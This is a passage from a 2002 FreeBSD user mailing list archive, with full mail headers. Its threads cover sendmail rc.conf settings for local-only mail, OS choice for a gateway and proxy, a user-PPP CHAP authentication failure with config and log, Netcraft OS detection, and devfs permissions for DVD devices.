conseils et pour votre réponse rapide. > > Please, mail in english to world-wide list. AFAIU, You need software to measure QoS for FBSD3.4 for IPv6 on both TCP and UDP (delay, etc.). I can't provide You with full information, but have a look at ports/net and ports/sysutils (less, but still possible). Also check ports/benchmarks (obviously). If You want to b quick, try pre-packaged software (on CD, or download from www.freebsd.org). I have no time to look at, but here some of packages: benchamrks/ netpipe nttcp tcpblast Hope, this help With respect, Alexander V Zubchenko, E-Mail: stalker@hermes-comp.zp.ua System Administrator, WWW: http://www.hermes-comp.zp.ua/ Hermes-comp, Ukraine, Zaporizhzhya, Geroev Stalingrada 50 phone/fax: +380 612 64-19-72 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 6:21:41 2002 Delivered-To: freebsd-questions@freebsd.org Received: from dire.bris.ac.uk (dire.bris.ac.uk [137.222.10.60]) by hub.freebsd.org (Postfix) with ESMTP id 0806337B403 for ; Tue, 25 Jun 2002 06:21:30 -0700 (PDT) Received: from mail.ilrt.bris.ac.uk by dire.bris.ac.uk with SMTP-PRIV with ESMTP; Tue, 25 Jun 2002 14:21:18 +0100 Received: from cmjg (helo=localhost) by mail.ilrt.bris.ac.uk with local-esmtp (Exim 3.16 #1) id 17MqFq-0001kq-00; Tue, 25 Jun 2002 14:21:10 +0100 Date: Tue, 25 Jun 2002 14:21:10 +0100 (BST) From: Jan Grant X-X-Sender: cmjg@mail.ilrt.bris.ac.uk To: Paul Everlund Cc: Joe & Fhe Barbish , FBSDQ Subject: RE: Periodic mails In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, 25 Jun 2002, Paul Everlund wrote: > On Tue, 25 Jun 2002, Jan Grant wrote: > > ----------> Thanks for your reply! > > > On Tue, 25 Jun 2002, Joe & Fhe Barbish wrote: > > > > > The connection attempt message you see in your /var/log/messages is > > > generated by the log-in-vain rc.conf option because you do not have > > > software listening on port 25 the pop3 server front door. > > > Do you have qpopper installed? > > > > Eh? Port 25 is for SMTP, not POP. > > > > > Do nslookup 192.168.0.5 to see what that ip address is. > > > > The address given is a nonrouable local address; potentially the > > address attached to an internal NIC. > > Yep, but my periodic mail should be send to localhost, so the address > do not have to be routable. On the other hand it is strange it tries > to send the mail via my firewall computer. > > > There are now four (count 'em!) sendmail switches that can be used in > > /etc/rc.conf - see your updated /etc/default/rc.conf for details. This > > was discussed in freebsd-stable when the changeover happened, so you may > > find more information there. Anyhoo, they are: > > Am not subscribed to freebsd-stable. It's hard to just keep up with > freebsd-questions. :-) > > > sendmail_enable="YES" # Run the sendmail inbound daemon (YES/NO/NONE). > > # If NONE, don't start any sendmail processes. > > sendmail_submit_enable="YES" # Start a localhost-only MTA for mail > > submission > > sendmail_outbound_enable="YES" # Dequeue stuck mail (YES/NO). > > sendmail_msp_queue_enable="YES" # Dequeue stuck clientmqueue mail (YES/NO). > > > > You probably want NO, YES, YES, YES, respectively. > > This setup, does it permit mails only from and to the localhost? > I want my computer to be totally closed to the outside when it > comes to mail. Only internal mail on the same machine should be > allowed. In which case, NO, YES, NO, YES. And then the answer to your question is (pretty closely) yes. Only localhost can originate mail; you should still be able to target mail to an offsite address; you need to fiddle with sendmail if you want to turn that facility off. -- jan grant, ILRT, University of Bristol. http://www.ilrt.bris.ac.uk/ Tel +44(0)117 9287088 Fax +44 (0)117 9287112 RFC822 jan.grant@bris.ac.uk (ECHOY GRUNTING) (EERIE WHISPERS) aren't subtitles great? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 6:26: 1 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.gmx.net (mail.gmx.net [213.165.64.20]) by hub.freebsd.org (Postfix) with SMTP id 7039B37B401 for ; Tue, 25 Jun 2002 06:25:57 -0700 (PDT) Received: (qmail 19224 invoked by uid 0); 25 Jun 2002 13:25:55 -0000 Received: from unknown (HELO corrsl7vs6l3tz) (203.200.168.184) by mail.gmx.net (mp005-rz3) with SMTP; 25 Jun 2002 13:25:55 -0000 Message-ID: <002801c21c4b$bde8a2e0$b8a8c8cb@corrsl7vs6l3tz> From: "Sanjay Bhattacharya" To: "Moti Levy" Cc: References: <17522.1024993490@www23.gmx.net> <026501c21c44$e8b67260$fd6e34c6@mlevy> Subject: Re: FreeBSD, Linux or Solaris Date: Tue, 25 Jun 2002 18:54:45 +0530 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG My office will buy a sparc box and we will most probably run Solaris 9, if at all we have to run Solaris. rgds, Sanjay > I will go with freebsd for the gateway and linux with ext3 for the caching > proxy . > are you talking about solaris for x86 or do you have a sparc box ? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 6:44:20 2002 Delivered-To: freebsd-questions@freebsd.org Received: from PHSEXCHICI.MGH.HARVARD.EDU (phsexchici.mgh.harvard.edu [132.183.126.51]) by hub.freebsd.org (Postfix) with ESMTP id 458C237B43A for ; Tue, 25 Jun 2002 06:43:54 -0700 (PDT) Received: by phsexchici.mgh.harvard.edu with Internet Mail Service (5.5.2650.21) id ; Tue, 25 Jun 2002 09:43:38 -0400 Message-ID: <375F68784081D511908A00508BE3BB1701EF1BF4@phsexch22.mgh.harvard.edu> From: "Morse, Richard E." To: 'Aaron Burke' , FreeBSD-Questions Subject: RE: microuptime() went backwards Date: Tue, 25 Jun 2002 09:43:35 -0400 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="ISO-8859-1" Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Aaron Burke [mailto:aburke@nullplusone.com] wrote: > I am encountering a new problem with my primary unix machine. In > the last two weeks, I have been getting the error "microuptime() > went backwards (49869.438718 -> 49869.-694941947)". The numbers > do change with each message. Hi! You should do a search through the list for this, but as I recall, the error has something to do with AMD specific hardware (a motherboard issue, I think?). I think that there is a syscntl setting you can use to correct this. As I don't have any hardware this manifests on, I've never had to do it myself, but it has shown up frequently on the list... HTH, Ricky To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 6:44:41 2002 Delivered-To: freebsd-questions@freebsd.org Received: from grillolja.cs.umu.se (grillolja.cs.umu.se [130.239.40.17]) by hub.freebsd.org (Postfix) with ESMTP id 171AD37B419 for ; Tue, 25 Jun 2002 06:44:08 -0700 (PDT) Received: from gren.cs.umu.se (gren.cs.umu.se [130.239.40.187]) (using TLSv1 with cipher EDH-RSA-DES-CBC3-SHA (168/168 bits)) (No client certificate requested) by grillolja.cs.umu.se (Postfix) with ESMTP id 2D9169FD7; Tue, 25 Jun 2002 15:44:07 +0200 (MEST) Date: Tue, 25 Jun 2002 15:44:06 +0200 (MEST) From: Paul Everlund To: Jan Grant Cc: Joe & Fhe Barbish , FBSDQ Subject: RE: Periodic mails In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, 25 Jun 2002, Jan Grant wrote: > On Tue, 25 Jun 2002, Paul Everlund wrote: > > > On Tue, 25 Jun 2002, Jan Grant wrote: > > > > > sendmail_enable="YES" # Run the sendmail inbound daemon (YES/NO/NONE). > > > # If NONE, don't start any sendmail processes. > > > sendmail_submit_enable="YES" # Start a localhost-only MTA for mail > > > submission > > > sendmail_outbound_enable="YES" # Dequeue stuck mail (YES/NO). > > > sendmail_msp_queue_enable="YES" # Dequeue stuck clientmqueue mail (YES/NO). > > > > > > You probably want NO, YES, YES, YES, respectively. > > > > This setup, does it permit mails only from and to the localhost? > > I want my computer to be totally closed to the outside when it > > comes to mail. Only internal mail on the same machine should be > > allowed. > > In which case, NO, YES, NO, YES. And then the answer to your question is > (pretty closely) yes. Only localhost can originate mail; you should > still be able to target mail to an offsite address; you need to fiddle > with sendmail if you want to turn that facility off. Thanks again for your reply! I'm not using mail on any of my FreeBSD boxes, so I lack some understanding how it all works. I at least do not want anyone to use my boxes for relaying spam mail. And as English isn't my native language I must ask this to be sure I understand you correct, and I only need a yes or no... With the proposed setup, "NO", "YES", "NO", "YES", no one from the outside can relay mail via my box? With the proposed setup, I can only send mail from localhost? With the setup, am I allowed to send mail to other computers than localhost? (Don't want this if I can avoid it.) If the answers are "correct", "yes" and "no" it's the setup I want. :-) Thanks once more for your answers. Best regards, Paul To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 6:54:11 2002 Delivered-To: freebsd-questions@freebsd.org Received: from web14807.mail.yahoo.com (web14807.mail.yahoo.com [216.136.224.223]) by hub.freebsd.org (Postfix) with SMTP id 57A8437B400 for ; Tue, 25 Jun 2002 06:53:55 -0700 (PDT) Message-ID: <20020625135355.68124.qmail@web14807.mail.yahoo.com> Received: from [202.155.54.147] by web14807.mail.yahoo.com via HTTP; Tue, 25 Jun 2002 06:53:55 PDT Date: Tue, 25 Jun 2002 06:53:55 -0700 (PDT) From: dodi agusri Subject: User PPP does not work To: tony-o@iij.ad.jp Cc: amurai@spec.co.jp MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I have been using USER PPP to connect to internet.It worked for several times.But now my connection to internet disconnected immediatelly before I can browse websites on the internet so I could not connect at all now. I am using FreeBSD 4.5. What was wrong ? ,what should I do ? PPP.CONF: default: set log phase Chat LCP IPCP tun command set device /dev/cuaa0 set speed 38400 disable pred1 deny pred1 disable lqr deny lqr set dial "ABORT BUSY ABORT NO\\sCARRIER TIMEOUT 50 \"\" \ ATZ OK-ATZ-OK ATDT\\T TIMEOUT 60 CONNECT" set redial 3 10 enable dns indosat775001 : set authname XXXXXXXX set authkey XXXXXXXX set phone XXXXXXXX set timeout 900 set openmode active accept pap set ifaddr 127.1.1.1/0 127.2.2.2/0 255.255.255.255 add 0 0 127.2.2.2 ======================================================== #PPP.LINKUP : indosat775001: delete ALL add 0 0 HISADDR ======================================================== # /var/log/ppp.log : Jun 8 12:14:15 server ppp[113]: Phase: Using interface: tun0 Jun 8 12:14:16 server ppp[113]: Phase: deflink: Created in closed state Jun 8 12:14:16 server ppp[113]: tun0: Command: default: set device /dev/cuaa0 Jun 8 12:14:16 server ppp[113]: tun0: Command: default: set speed 38400 Jun 8 12:14:16 server ppp[113]: tun0: Command: default: disable pred1 Jun 8 12:14:16 server ppp[113]: tun0: Command: default: deny pred1 Jun 8 12:14:16 server ppp[113]: tun0: Command: default: disable lqr Jun 8 12:14:16 server ppp[113]: tun0: Command: default: deny lqr Jun 8 12:14:16 server ppp[113]: tun0: Command: default: set dial ABORT BUSY ABORT NO\sCARRIER TIMEOUT 50 "" ATZ OK-ATZ-OK ATDT\T TIMEOUT 60 CONNECT Jun 8 12:14:16 server ppp[113]: tun0: Command: default: set redial 3 10 Jun 8 12:14:16 server ppp[113]: tun0: Command: default: enable dns Jun 8 12:14:16 server ppp[113]: tun0: Command: pos: set authname silicom Jun 8 12:14:16 server ppp[113]: tun0: Command: pos: set authkey ******** Jun 8 12:14:16 server ppp[113]: tun0: Command: pos: set phone 27789 Jun 8 12:14:16 server ppp[113]: tun0: Command: pos: set timeout 900 Jun 8 12:14:16 server ppp[113]: tun0: Command: pos: set openmode active Jun 8 12:14:16 server ppp[113]: tun0: Command: pos: accept chap Jun 8 12:14:16 server ppp[113]: tun0: Command: pos: set ifaddr 127.1.1.1/0 127.2.2.2/0 255.255.255.255 Jun 8 12:14:16 server ppp[113]: tun0: Command: pos: add 0 0 127.2.2.2 Jun 8 12:14:16 server ppp[114]: tun0: Phase: PPP Started (auto mode). Jun 8 12:14:44 server ppp[114]: tun0: Phase: bundle: Establish Jun 8 12:14:44 server ppp[114]: tun0: Phase: deflink: closed -> opening Jun 8 12:14:44 server ppp[114]: tun0: Phase: deflink: Connected! Jun 8 12:14:44 server ppp[114]: tun0: Phase: deflink: opening -> dial Jun 8 12:14:44 server ppp[114]: tun0: Chat: Phone: 27789 Jun 8 12:14:44 server ppp[114]: tun0: Chat: deflink: Dial attempt 1 of 10 Jun 8 12:14:44 server ppp[114]: tun0: Chat: Send: ATZ^M Jun 8 12:14:44 server ppp[114]: tun0: Chat: Expect(50): OK Jun 8 12:14:44 server ppp[114]: tun0: Chat: Received: ATZ^M^M Jun 8 12:14:44 server ppp[114]: tun0: Chat: Received: OK^M Jun 8 12:14:44 server ppp[114]: tun0: Chat: Send: ATDT27789^M Jun 8 12:14:44 server ppp[114]: tun0: Chat: Expect(60): CONNECT Jun 8 12:15:04 server ppp[114]: tun0: Chat: Received: ATDT27789^M^M Jun 8 12:15:04 server ppp[114]: tun0: Chat: Received: CONNECT 33600/ARQ/V34/LAPM/V42BIS^M Jun 8 12:15:04 server ppp[114]: tun0: Phase: deflink: dial -> carrier Jun 8 12:15:05 server ppp[114]: tun0: Phase: deflink: /dev/cuaa0: CD detected Jun 8 12:15:05 server ppp[114]: tun0: Phase: deflink: carrier -> login Jun 8 12:15:05 server ppp[114]: tun0: Phase: deflink: login -> lcp Jun 8 12:15:05 server ppp[114]: tun0: LCP: FSM: Using "deflink" as a transport Jun 8 12:15:05 server ppp[114]: tun0: LCP: deflink: State change Initial --> Closed Jun 8 12:15:05 server ppp[114]: tun0: LCP: deflink: State change Closed --> Stopped Jun 8 12:15:06 server ppp[114]: tun0: LCP: deflink: LayerStart Jun 8 12:15:06 server ppp[114]: tun0: LCP: deflink: SendConfigReq(1) state = Stopped Jun 8 12:15:06 server ppp[114]: tun0: LCP: ACFCOMP[2] Jun 8 12:15:06 server ppp[114]: tun0: LCP: PROTOCOMP[2] Jun 8 12:15:06 server ppp[114]: tun0: LCP: ACCMAP[6] 0x00000000 Jun 8 12:15:06 server ppp[114]: tun0: LCP: MRU[4] 1500 Jun 8 12:15:06 server ppp[114]: tun0: LCP: MAGICNUM[6] 0x735f804d Jun 8 12:15:06 server ppp[114]: tun0: LCP: deflink: State change Stopped --> Req-Sent Jun 8 12:15:06 server ppp[114]: tun0: LCP: deflink: RecvConfigReq(1) state = Req-Sent Jun 8 12:15:06 server ppp[114]: tun0: LCP: MRU[4] 1522 Jun 8 12:15:06 server ppp[114]: tun0: LCP: ACCMAP[6] 0x000a0000 Jun 8 12:15:06 server ppp[114]: tun0: LCP: AUTHPROTO[12] 0xc027 (unknown) Jun 8 12:15:06 server ppp[114]: tun0: LCP: AUTHPROTO[12] 0xc027 - not recognised, NAK Jun 8 12:15:06 server ppp[114]: tun0: LCP: MAGICNUM[6] 0xa05dec47 Jun 8 12:15:06 server ppp[114]: tun0: LCP: ACFCOMP[2] Jun 8 12:15:06 server ppp[114]: tun0: LCP: deflink: SendConfigNak(1) state = Req-Sent Jun 8 12:15:06 server ppp[114]: tun0: LCP: AUTHPROTO[12] 0xc027 (unknown) Jun 8 12:15:06 server ppp[114]: tun0: LCP: deflink: RecvConfigAck(1) state = Req-Sent Jun 8 12:15:06 server ppp[114]: tun0: LCP: deflink: State change Req-Sent --> Ack-Rcvd Jun 8 12:15:06 server ppp[114]: tun0: LCP: deflink: RecvConfigReq(2) state = Ack-Rcvd Jun 8 12:15:06 server ppp[114]: tun0: LCP: MRU[4] 1522 Jun 8 12:15:06 server ppp[114]: tun0: LCP: ACCMAP[6] 0x000a0000 Jun 8 12:15:06 server ppp[114]: tun0: LCP: AUTHPROTO[8] 0xc027 (unknown) Jun 8 12:15:06 server ppp[114]: tun0: LCP: AUTHPROTO[8] 0xc027 - not recognised, NAK Jun 8 12:15:06 server ppp[114]: tun0: LCP: MAGICNUM[6] 0xa05dec47 Jun 8 12:15:06 server ppp[114]: tun0: LCP: ACFCOMP[2] Jun 8 12:15:06 server ppp[114]: tun0: LCP: deflink: SendConfigNak(2) state = Ack-Rcvd Jun 8 12:15:06 server ppp[114]: tun0: LCP: AUTHPROTO[8] 0xc027 (unknown) Jun 8 12:15:07 server ppp[114]: tun0: LCP: deflink: RecvConfigReq(3) state = Ack-Rcvd Jun 8 12:15:07 server ppp[114]: tun0: LCP: MRU[4] 1522 Jun 8 12:15:07 server ppp[114]: tun0: LCP: ACCMAP[6] 0x000a0000 Jun 8 12:15:07 server ppp[114]: tun0: LCP: AUTHPROTO[8] 0xc123 (unknown) Jun 8 12:15:07 server ppp[114]: tun0: LCP: AUTHPROTO[8] 0xc123 - not recognised, NAK Jun 8 12:15:07 server ppp[114]: tun0: LCP: MAGICNUM[6] 0xa05dec47 Jun 8 12:15:07 server ppp[114]: tun0: LCP: ACFCOMP[2] Jun 8 12:15:07 server ppp[114]: tun0: LCP: deflink: SendConfigNak(3) state = Ack-Rcvd Jun 8 12:15:07 server ppp[114]: tun0: LCP: AUTHPROTO[8] 0xc123 (unknown) Jun 8 12:15:07 server ppp[114]: tun0: LCP: deflink: RecvConfigReq(4) state = Ack-Rcvd Jun 8 12:15:07 server ppp[114]: tun0: LCP: MRU[4] 1522 Jun 8 12:15:07 server ppp[114]: tun0: LCP: ACCMAP[6] 0x000a0000 Jun 8 12:15:07 server ppp[114]: tun0: LCP: AUTHPROTO[5] 0xc223 (CHAP 0x05) Jun 8 12:15:07 server ppp[114]: tun0: LCP: MAGICNUM[6] 0xa05dec47 Jun 8 12:15:07 server ppp[114]: tun0: LCP: ACFCOMP[2] Jun 8 12:15:07 server ppp[114]: tun0: LCP: deflink: SendConfigAck(4) state = Ack-Rcvd Jun 8 12:15:07 server ppp[114]: tun0: LCP: MRU[4] 1522 Jun 8 12:15:07 server ppp[114]: tun0: LCP: ACCMAP[6] 0x000a0000 Jun 8 12:15:07 server ppp[114]: tun0: LCP: AUTHPROTO[5] 0xc223 (CHAP 0x05) Jun 8 12:15:07 server ppp[114]: tun0: LCP: MAGICNUM[6] 0xa05dec47 Jun 8 12:15:07 server ppp[114]: tun0: LCP: ACFCOMP[2] Jun 8 12:15:07 server ppp[114]: tun0: LCP: deflink: State change Ack-Rcvd --> Opened Jun 8 12:15:07 server ppp[114]: tun0: LCP: deflink: LayerUp Jun 8 12:15:07 server ppp[114]: tun0: Phase: bundle: Authenticate Jun 8 12:15:07 server ppp[114]: tun0: Phase: deflink: his = CHAP 0x05, mine = none Jun 8 12:15:07 server ppp[114]: tun0: Phase: Chap Input: CHALLENGE (16 bytes from p01-sv2) Jun 8 12:15:07 server ppp[114]: tun0: Phase: Chap Output: RESPONSE (silicom) Jun 8 12:15:08 server ppp[114]: tun0: Phase: Chap Input: FAILURE Jun 8 12:15:08 server ppp[114]: tun0: LCP: deflink: LayerDown Jun 8 12:15:08 server ppp[114]: tun0: LCP: deflink: SendTerminateReq(2) state = Opened Jun 8 12:15:08 server ppp[114]: tun0: LCP: deflink: State change Opened --> Closing Jun 8 12:15:08 server ppp[114]: tun0: Phase: Chap Input: CHALLENGE (16 bytes from p01-sv2) Jun 8 12:15:08 server ppp[114]: tun0: Phase: Chap Output: RESPONSE (silicom) Jun 8 12:15:08 server ppp[114]: tun0: LCP: deflink: RecvTerminateAck(2) state = Closing Jun 8 12:15:08 server ppp[114]: tun0: LCP: deflink: LayerFinish Jun 8 12:15:08 server ppp[114]: tun0: LCP: deflink: State change Closing --> Closed Jun 8 12:15:08 server ppp[114]: tun0: LCP: deflink: State change Closed --> Initial Jun 8 12:15:08 server ppp[114]: tun0: Phase: deflink: Disconnected! Jun 8 12:15:08 server ppp[114]: tun0: Phase: deflink: lcp -> logout Jun 8 12:15:08 server ppp[114]: tun0: Phase: deflink: logout -> hangup Jun 8 12:15:08 server ppp[114]: tun0: Phase: deflink: Disconnected! Jun 8 12:15:08 server ppp[114]: tun0: Phase: deflink: Connect time: 24 secs: 398 octets in, 297 octets out Jun 8 12:15:08 server ppp[114]: tun0: Phase: deflink: : 17 packets in, 8 packets out Jun 8 12:15:08 server ppp[114]: tun0: Phase: total 28 bytes/sec, peak 101 bytes/sec on Sat Jun 8 12:15:08 2002 Jun 8 12:15:08 server ppp[114]: tun0: Phase: deflink: hangup -> closed Jun 8 12:15:08 server ppp[114]: tun0: Phase: bundle: Dead __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 6:55:40 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mailb.telia.com (mailb.telia.com [194.22.194.6]) by hub.freebsd.org (Postfix) with ESMTP id 670E637B400 for ; Tue, 25 Jun 2002 06:55:30 -0700 (PDT) Received: from rambo.simx.org (62-59.twenty4help.se [62.20.102.59] (may be forged)) by mailb.telia.com (8.11.6/8.11.6) with ESMTP id g5PDtQg06828; Tue, 25 Jun 2002 15:55:26 +0200 (CEST) Message-ID: <3D18768E.2000600@rambo.simx.org> Date: Tue, 25 Jun 2002 15:56:30 +0200 From: "Roger 'Rocky' Vetterberg" User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0rc2) Gecko/20020512 Netscape/7.0b1 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Philippe CASIDY Cc: "FreeBSD.org Questions" Subject: Re: Amount of FreeBSD servers is decreasing in servers statistics References: <200206250952.g5P9pxYL001688@gueway.home> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Philippe CASIDY wrote: > On 25 Jun, Roger 'Rocky' Vetterberg wrote: > >>Philippe CASIDY wrote: > >>>I read that I were using Apache2 on unknown where I expected it to be : >> >>The same happened to me after upgrading to FreeBSD 4.6. >>My guess is that something changed between 4.5 to 4.6 that makes >>Netcraft unable to recognize the os. It will probably not take >>long before Netcraft notices and updates their detection software >>to correctly identify FreeBSD 4.6 as well. >> > > > Do I have to understand that it has always happend like this? and that > netcraft people will notice that and fixed that on their side? > > Thanks > > Phil. I cant say for sure that it has always happened with Netcraft, though Im almost certain it has. I know nmap and other os detection software often is unable to detect the latest version of a os immediatly after its release, but as said earlier this is often if not always fixed in the next release. Allthough Netcraft is a webpage, that page is powered by software, and as such that too has to be updated sometimes. I would give the people at Netcraft a few days or perhaps a week, and if nothing changes try emailing them and make them aware of this. -- R To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 7: 1:32 2002 Delivered-To: freebsd-questions@freebsd.org Received: from maild.telia.com (maild.telia.com [194.22.190.101]) by hub.freebsd.org (Postfix) with ESMTP id 1A30F37B400 for ; Tue, 25 Jun 2002 07:01:28 -0700 (PDT) Received: from rambo.simx.org (62-59.twenty4help.se [62.20.102.59] (may be forged)) by maild.telia.com (8.11.6/8.11.6) with ESMTP id g5PE1Pt17990; Tue, 25 Jun 2002 16:01:25 +0200 (CEST) Message-ID: <3D1877F9.9040305@rambo.simx.org> Date: Tue, 25 Jun 2002 16:02:33 +0200 From: "Roger 'Rocky' Vetterberg" User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0rc2) Gecko/20020512 Netscape/7.0b1 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Sanjay Bhattacharya Cc: freebsd-questions@FreeBSD.ORG Subject: Re: FreeBSD, Linux or Solaris References: <17522.1024993490@www23.gmx.net> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Sanjay Bhattacharya wrote: > Hi guys, > > I have a question for you. I am running a network consisting of an > internal network of 30 clients running win9x boxes. I am running a DMZ which > contains an email server, an web server, a dns server and a caching proxy server. My > gateway box is connected to a cisco router which is connected to the net. My > gateway box is also connected to the internal network and the dmz. The Win9x > clients need access to the caching proxy, email server and dns. Now what > kind of OS do you guys suggest for the box hosting the caching proxy server and > the box hosting the gateway? Performance wise which'll give me the best: > Linux, Solaris of FreeBSD? I thank you guys in advance. > > Regards, > Sanjay This is of course a question of personal taste, but I would probably choose FreeBSD. On small or medium size networks and on x86 hardware I find it hard to beat fbsd's performance. Linux is gaining performance wise, they have made some significant improvements lately, but Linux still gives me an icky feeling. I just cant sleep well at night if I have to trust Linux to run my servers. Solaris sure is stable enough to be trusted, but performance wise it takes very expensive hardware to match freebsd. Solaris on i386 is just bad. I would go with FreeBSD, but as I already said, thats just my personal opinion. -- R To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 7: 4:33 2002 Delivered-To: freebsd-questions@freebsd.org Received: from csharp.dyndns.org (p50871914.dip.t-dialin.net [80.135.25.20]) by hub.freebsd.org (Postfix) with ESMTP id EA13A37B400 for ; Tue, 25 Jun 2002 07:04:28 -0700 (PDT) Received: from mephisto by csharp.dyndns.org with local (Exim 4.05) id 17Mqx9-0001oa-00 for freebsd-questions@freebsd.org; Tue, 25 Jun 2002 16:05:55 +0200 Date: Tue, 25 Jun 2002 16:05:54 +0200 From: Christopher Sharp To: freebsd-questions@freebsd.org Subject: Re: devfs question Message-ID: <20020625140554.GA5113@web.de> Mail-Followup-To: freebsd-questions@freebsd.org References: <200206251231.FAA02109@eskimo.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200206251231.FAA02109@eskimo.com> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On (25/06/02 05:31), Ross Lippert wrote: > Date: Tue, 25 Jun 2002 05:31:31 -0700 (PDT) > From: Ross Lippert > To: freebsd-questions@freebsd.org > Subject: devfs question > I'm writing a section for the handbook on multimedia and I have a question > about devfs. I am not running CURRENT, so I do not know much about how to > set devfs up. > The basic problem is this: many dvd playing apps either use as default > or use hardcoded (god forbid, but it happens) /dev/dvd as the dvd device. > And, to avoid having to run them as root, write permissions must be granted. > So, what you'd like to have is > # chmod 664 /dev/acd0c > # ln -sf /dev/acd0c /dev/dvd > # ln -sf /dev/acd0c /dev/rdvd > Under 5.X, I seem to recall seeing somewhere that there is some sort > of conf file in which one can specify this setup so that these > commands do not need to be re-run at boot every time. > Can someone tell me what is the right bit of magic I should tel people > to do? Just add the above commands to /etc/rc.devfs -- Any time things appear to be going better, you have overlooked something. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 7:11:35 2002 Delivered-To: freebsd-questions@freebsd.org Received: from maild.telia.com (maild.telia.com [194.22.190.101]) by hub.freebsd.org (Postfix) with ESMTP id CDD6537B401 for ; Tue, 25 Jun 2002 07:11:26 -0700 (PDT) Received: from rambo.simx.org (62-59.twenty4help.se [62.20.102.59] (may be forged)) by maild.telia.com (8.11.6/8.11.6) with ESMTP id g5PEBPt06626; Tue, 25 Jun 2002 16:11:25 +0200 (CEST) Message-ID: <3D187A52.3070203@rambo.simx.org> Date: Tue, 25 Jun 2002 16:12:34 +0200 From: "Roger 'Rocky' Vetterberg" User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0rc2) Gecko/20020512 Netscape/7.0b1 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Paul Everlund Cc: FBSDQ Subject: Re: Periodic mails References: Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Paul Everlund wrote: > On Tue, 25 Jun 2002, Jan Grant wrote: *snip* >>In which case, NO, YES, NO, YES. And then the answer to your question is >>(pretty closely) yes. Only localhost can originate mail; you should >>still be able to target mail to an offsite address; you need to fiddle >>with sendmail if you want to turn that facility off. > > > Thanks again for your reply! > > I'm not using mail on any of my FreeBSD boxes, so I lack some > understanding how it all works. I at least do not want anyone > to use my boxes for relaying spam mail. > > And as English isn't my native language I must ask this to be > sure I understand you correct, and I only need a yes or no... > > With the proposed setup, "NO", "YES", "NO", "YES", no one from > the outside can relay mail via my box? > > With the proposed setup, I can only send mail from localhost? > > With the setup, am I allowed to send mail to other computers > than localhost? (Don't want 